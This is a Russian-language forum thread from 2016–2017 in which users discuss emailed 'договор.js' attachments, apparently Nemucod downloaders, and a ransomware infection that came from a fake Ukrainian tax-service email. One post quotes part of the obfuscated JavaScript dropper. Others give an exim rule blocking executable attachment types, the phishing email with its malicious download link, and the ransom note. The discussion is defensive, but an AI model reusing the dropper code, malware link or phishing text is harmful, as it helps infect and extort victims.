Рассылки на почту файлов *.js (договор.js), что это? |
Здравствуйте Гость [ Вход | Регистрация ] | Форум в сети 6774-й день
Шановні користувачі! Запрошуємо вас до офіційного телеграм-канала 0day Community. Тут ви зможете поспілкуватися одне з одним та дізнатися про останні новини щодо роботи ресурса, поставити запитання до адміністрації, тощо. Перейти до телеграм-канала можна відсканувавши QR-код або натиснувши на посилання: @zeroday_ua |
Рассылки на почту файлов *.js (договор.js), что это? |
schweps |
Oct 6 2016, 7:11
Пост
#1
|
Репутация: 177 Старожил Группа: Пользователи Сообщений: 2 000 С нами с: 20-July 06 |
Иногда приходят на почту письма с темой вот подпишите договор или трудоустройство нашего сотрудника 0_о с копией паспорта и файлом договор.js/
Нод ничего не определяет файл содержания: » Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... « Сообщение отредактировал schweps - Oct 6 2016, 7:12 |
Morftimg |
Oct 6 2016, 9:02
Пост
#2
|
Благодарности: 10 Репутация: 754 0day rescue Группа: Модеры Сообщений: 4 491 С нами с: 21-April 06 |
Правильно. Потому что пока это не вирус
Когда запуститься скрипт он соберет из исходников тело заразы На самом деле в последнее время только такое и приходит Не лениться повторять всем юзерам про опасность. |
Dandan |
Oct 6 2016, 9:39
Пост
#3
|
Репутация: 34 Активист Группа: Пользователи Сообщений: 205 С нами с: 17-December 11 |
Код определенно часть вируса. Но по этой части что он делает и как запускается понять нельзя.
|
Allex |
Oct 6 2016, 9:50
Пост
#4
|
Благодарности: 348 Репутация: 1435 Sphynx in Mirror Группа: Модеры Сообщений: 23 053 С нами с: 2-February 07 |
Код определенно часть вируса. Но по этой части что он делает и как запускается понять нельзя. Похоже, у спойлера есть ограничение на размер - в письме-уведомлении о теме кода гораздо больше, и в конце, после всех "функций" есть что-то типа "сборщика": var yxox = new Function(ihyhebn6() + tadho0() + ihyminiha8() + fyzheb0() + tkoxubda1() + aguvuzysi2() + ifcot5() + taxegvofy1() + sehro3() + aceqb8() + gvydedujbu0() + ahxebvuh0() + yndohdy9() + ubegmo4() + tupmujzadud3() + sozocpexbagg3() + acdype7() + ybxapfihylj8() + bmopnipxahsa1() + nletitpy0() + rerjolpoju7() + mumge0() + nvasichoghy6() + vcimrehrugy6() + jebdivtopudc3() + ofmypapho5() + zana9() + opkakzy0() + gfejcecdylovb2() + kozesvaz0() + egmikymers5() + intabxiqodk2() + jjownersipefh3() + ovupagfidx1() + exgur5() + yxvic8() + drorezivi2() + japfosuwv6() + ecnutra5() + idipqyce3() + bjuftopvuwi0() + uqahydje0() + hegozyjtatt7() + pkyzgetpa7() + utjucfazemc0() + nhanotoki3() + ubnevuhxy4()); switch (yxox()) { case '': ewhyjlali3 = apesotperda4[cryvuxagerd7() + rotu9() + dbyhgyzto9()]; tceqkin5 = ewhyjlali3[agtukwocj5() + ojzagyjufo9() + ybupvyz3() + qculobivmo6()](vogjaqodti0() + kuto1() + pefnifa9() + atan0() + agykulytp0() + icnadsehceqe4() + lbegporet3() + irorv4() + imruhjekwuxe0()); uzotly2 = ewhyjlali3[agtukwocj5() + ojzagyjufo9() + ybupvyz3() + qculobivmo6()](gxavsegawuff2() + afkapgixidb3() + ukyvixnox5() + ygovxifyrxi0() + iccaregx0()); pacyfc5 = ewhyjlali3[agtukwocj5() + ojzagyjufo9() + ybupvyz3() + qculobivmo6()](jucinint8() + xvazurh6() + tdetrahygi0() + evpew5() + ralsimxaqy1()); bednomha2 = ewhyjlali3[agtukwocj5() + ojzagyjufo9() + ybupvyz3() + qculobivmo6()](mjemsipsokwu3() + wrytdedyceh4() + ufrymuli0() + lyjhisd1()); edehky1 = tceqkin5[oxtefd8() + kexavyhjub5() + idycmeknuv5() + lninijevy8() + yvmorpoji4() + zcigcufp6()](zise5()); urnawxy4 = tceqkin5[vapzalk1() + wqecwi3() + jfijdifafqa0() + stezyrxafe0() + ufeqsu0() + juqu3()](); ncipsyzty4 = pacyfc5[ubhuxbipn5() + soxenqa1()](cyfuj2() + yvdihbywcimh2(), aptewemke4() + ijytihqu9() + wasbuhi2() + ytluhgajf8() + ofisyjgagqo1() + asot3() + lydi0() + acjyzucdy9() + bokneqa0() + ajynyze3() + ibvyshadzid7() + hwoqyhvavo0() + hzona9() + caldyhb8() + hlingimydsa6() + rhedmet8() + axvyjmemvadr3(), yqzagwykq6()); ncipsyzty4 = pacyfc5[fixox3() + pyrhetjygaxh2()](); bednomha2[acmempes0() + idqara7()] = epcom1(); labqijkus5 = pacyfc5[hmyvqabijfe7() + imtelkobi6() + pico4() + ehavixwu3() + djizizokim1() + exenpux5()]; ogqojewk3 = ewhyjlali3[anesa5() + hizixpyf7() + kwyjmogib4() + vahorwyrxu8() + idavli1() + aswadre9() + yceppyb0()]; ncipsyzty4 = bednomha2[suxa0() + ewcudarorqy1()](); ncipsyzty4 = bednomha2[qabubvebilv9() + qofogax0() + mjiftapf2()](labqijkus5); ncipsyzty4 = bednomha2[wuqtigmi6() + ypnehy2() + iwuv2() + ujcojvesic6()](edehky1 + urnawxy4); ncipsyzty4 = bednomha2[lqalhin2() + inyzusli4()](); ncipsyzty4 = uzotly2[ctymeval0() + badwy5()](bbimeqw0() + idemo4() + hbokkikfalufk6() + adifepeg1() + edehky1 + urnawxy4, yqzagwykq6()); break; } ncipsyzty4 = tceqkin5[hiwmompe5() + egekcul1() + iwmyno3() + devi2()](ogqojewk3); |
Morftimg |
Oct 6 2016, 9:50
Пост
#5
|
Благодарности: 10 Репутация: 754 0day rescue Группа: Модеры Сообщений: 4 491 С нами с: 21-April 06 |
|
Vitaliy_y |
Oct 6 2016, 10:11
Пост
#6
|
Репутация: 131 Cтаршой Группа: Пользователи Сообщений: 962 С нами с: 3-July 07 |
deny message = Possible Microsoft JScript attack ($found_extension)
log_message = REJECT: Bad attachment demime = js и warn message = X-SS-Suspicious-Flag: YES condition = ${if match{$mime_filename}{\N(?i)\.zip$\N}} decode = default condition = ${if match{${run{/usr/local/bin/unzip -l \ $mime_decoded_filename}}}\ {\N(?i)\.(ade|adp|bas|bat|chm|cmd|com|cpl|crt|exe|hlp|hta|inf|ins|isp|jse|js|lnk|mde|msc| msi|msp|pcd|reg|scr|sct|url|vbs|vbe|wsf|wsh|wsc|wmv|wma|mp3|avi|zip|rar|7z|mpg)\n\N}} и т.п. для 7zip и rar снимают много головной боли настройки для exim. При чем очень часто эту гадость не видит на drweb ни clamav и локальные виндовые антивири. Сообщение отредактировал Vitaliy_y - Oct 6 2016, 10:12 |
schweps |
Oct 6 2016, 15:32
Пост
#7
|
Репутация: 177 Старожил Группа: Пользователи Сообщений: 2 000 С нами с: 20-July 06 |
вот гандоши) полюбому половина офиса себе запустило посмотреть что это за договор))
|
symbian9 |
Oct 6 2016, 16:16
Пост
#8
|
Репутация: 238 Asinus asinum fricat Группа: Пользователи Сообщений: 2 563 С нами с: 3-September 09 |
залейте на обменник, хочу в виртуалке посмотреть шо оно делает)
|
schweps |
Oct 7 2016, 7:46
Пост
#9
|
Репутация: 177 Старожил Группа: Пользователи Сообщений: 2 000 С нами с: 20-July 06 |
залейте на обменник, хочу в виртуалке посмотреть шо оно делает) сегодня какраз свежач0к пришел скинул в пм ссылку !используете на свой страх и риск! еще забанят меня) странно но шлет на почту только мне, вродь никуда на рассылки не подписывался, мейл в инете не светится вторая странность во вчерашнем архиве вирусов небыло (по реакции нода) сегодня пытаюсь его скачать - блокирует пишет троян. с сегодняшним все в порядке _____________________________ а вот результат онлайн вирус тотала Антивирус Результат Дата обновления Antiy-AVL Trojan/Generic.ASVCS3S.3FB 20161007 Cyren JS/Nemucod.DZ!Eldorado 20161007 F-Prot JS/Nemucod.DZ!Eldorado 20161007 GData Script.Trojan-Downloader.Nemucod.DI 20161007 Tencent Js.Trojan.Raas.Auto 20161007 |
Sintorres |
Oct 11 2016, 11:23
Пост
#10
|
Благодарности: 1871 Репутация: 837 Старожил Группа: Модеры Сообщений: 3 673 С нами с: 20-March 06 |
deny message = Possible Microsoft JScript attack ($found_extension) log_message = REJECT: Bad attachment demime = js и warn message = X-SS-Suspicious-Flag: YES condition = ${if match{$mime_filename}{\N(?i)\.zip$\N}} decode = default condition = ${if match{${run{/usr/local/bin/unzip -l \ $mime_decoded_filename}}}\ {\N(?i)\.(ade|adp|bas|bat|chm|cmd|com|cpl|crt|exe|hlp|hta|inf|ins|isp|jse|js|lnk|mde|msc| msi|msp|pcd|reg|scr|sct|url|vbs|vbe|wsf|wsh|wsc|wmv|wma|mp3|avi|zip|rar|7z|mpg)\n\N}} и т.п. для 7zip и rar снимают много головной боли настройки для exim. При чем очень часто эту гадость не видит на drweb ни clamav и локальные виндовые антивири. Как это к постфиксу прикрутить? |
Console |
Mar 3 2017, 22:46
Пост
#11
|
Репутация: 498 ultra active user Группа: Пользователи Сообщений: 11 284 С нами с: 23-March 08 |
Ну к примеру Nod32 разпознал как троян, лежал в виде txt, но без расширения. Порядка 750 строчек кода.. Завтра точней скажу как обозвал антивирь( но выявил только после запуска полного сканирывания)....
UP. JS/TrojanDownloader.NemucodCGQ Сообщение отредактировал Console - Mar 7 2017, 18:37 |
schweps |
Mar 16 2017, 19:12
Пост
#12
|
Репутация: 177 Старожил Группа: Пользователи Сообщений: 2 000 С нами с: 20-July 06 |
вот сегодня бомбочку бухгалтер словила
Письмо Міністерство Доходів і Зборів - вам штраф и типа ссылка красивая на сайт киевской ДФС Заходит по ссылке - качает файлик, З_А_П_У_С_К_А_Е_Т! и вуаля - все файлы на компе превращаются...превращаются в кучку зашифрованных файлов =) короче весело, ищу щас решение, пока ничего не берет, вирь из свежих |
public@ |
Mar 16 2017, 19:33
Пост
#13
|
Репутация: -166 Старожил Группа: BANNED Сообщений: 2 604 С нами с: 15-October 15 |
Державна фіскальна служба України Кому: мне
Вчера, 16:06оплата рахунку Шановний платник податків . Повідомляємо Вас про наявну заборгованість! Загрузити можете з нашого сайту: https://sta-sumy.gov.ua/downloads/2017-03/7....html?tm=156243 А в ссылку прикреплена другая ссылка http://www.tronenglish.com/news/wp-content...s/documents.zip Якщо у Вас виникли питання Ви можете зателефонувати за телефонами, вказаними на нашому сайті. З повагою,відділ по роботі з клієнтами, Манько Олеся Юрьївна Сообщение отредактировал public@ - Mar 16 2017, 19:35 |
Balamut74 |
Mar 16 2017, 19:51
Пост
#14
|
Репутация: 510 Юный падаван Группа: Пользователи Сообщений: 6 276 С нами с: 9-February 09 |
так загрузи и запусти, по результатам не забудь отписаться! |
schweps |
Mar 16 2017, 22:04
Пост
#15
|
Репутация: 177 Старожил Группа: Пользователи Сообщений: 2 000 С нами с: 20-July 06 |
ага такой наломный прикол)) инфы умерло море, и расшифровки походу нету
|
Console |
Mar 16 2017, 23:20
Пост
#16
|
Репутация: 498 ultra active user Группа: Пользователи Сообщений: 11 284 С нами с: 23-March 08 |
http://sfs.gov.ua/media-tsentr/novini/289258.html
На ITC еще вроде было... Посилання, що міститься у тексті листа та нібито перенаправляє на портал ДФС, насправді є гіперпосиланням, яке веде на сторонню Інтернет-сторінку та призводить до завантаження вірусного файлу (троянської програми). |
symbian9 |
Mar 17 2017, 0:42
Пост
#17
|
Репутация: 238 Asinus asinum fricat Группа: Пользователи Сообщений: 2 563 С нами с: 3-September 09 |
|
schweps |
Mar 17 2017, 16:34
Пост
#18
|
Репутация: 177 Старожил Группа: Пользователи Сообщений: 2 000 С нами с: 20-July 06 |
Испробовал все лекарства - ничем не дешифровывается)
Написал даже этому "хакеру" как он и просил в реадме.тхт ответ: Стоимость дешифровки 200$. Пришлите 1 файл(бесплатно расшифровываю 1 файл весом до 2 мб,не содержащий важной информации, только для того чтобы вы смогли опознать, что это ваш файл, никаких отчетностей, дипломов, курсовых, презентаций бесплатно расшифровываться не будет и мы расшифруем в качестве подтверждения того что файлы могут быть восстановлены). В течение от 5 минут до часа с момента оплаты вышлем программу и ключ которая в точности вернет все как было. Не пытайтесь восстановить данные с помощью антивирусных утилит, испортите все файлы Если хотите попробывать, пробуйте на другом ПК и минимум файлов, иначе потом даже я не смогу помочь. И помните пожалуйста, что цена каждый день растет. PS Пишите четко, ясно, предельно понятно, учитывайте, что кроме Вас пишет много человек, в диалоги не вступаю, работа по приницпу быстро заплатил, сразу получил.Не устраивает цена услуги, больше не пишите. Биткоины можно купить или добывать БЕСПЛАТНО, например майнить.О майнинге можно почитать в википедии или на других ресурсах. УСлуга расшифровки бесплатная.Вам выбирать, бесплатно добывать биткоины либо не теряя времени их купить.Решать только Вам 200 уе биткоинами говорит иди намайни по быстрому и приходи если бы у меня там были важные файлы или типа того пришлось бы платить... делайте бекапы люди) |
chip_ |
Mar 17 2017, 18:38
Пост
#19
|
Репутация: 134 Постоялец Группа: Пользователи Сообщений: 1 385 С нами с: 15-February 10 |
У нас такие типо от привата приходят, предприимчивые гады)))
|
symbian9 |
Apr 1 2017, 19:05
Пост
#20
|
Репутация: 238 Asinus asinum fricat Группа: Пользователи Сообщений: 2 563 С нами с: 3-September 09 |
|
Упрощённая версия | Сейчас: 1st October 2024 - 14:03 |
Сайт не розміщує електронні версії творів, а займається лише колекціонуванням та каталогізацією посилань, що публікуються нашими користувачами. Якщо Ви є правовласником якоїсь частини опублікованого матеріалу та не бажаєте, щоб посилання на нього знаходилось в нашому каталозі, зв’яжіться з нами і ми видалимо його. Файли для обміну надані користувачами сайту і адміністрація не несе відповідальності за їх вміст. |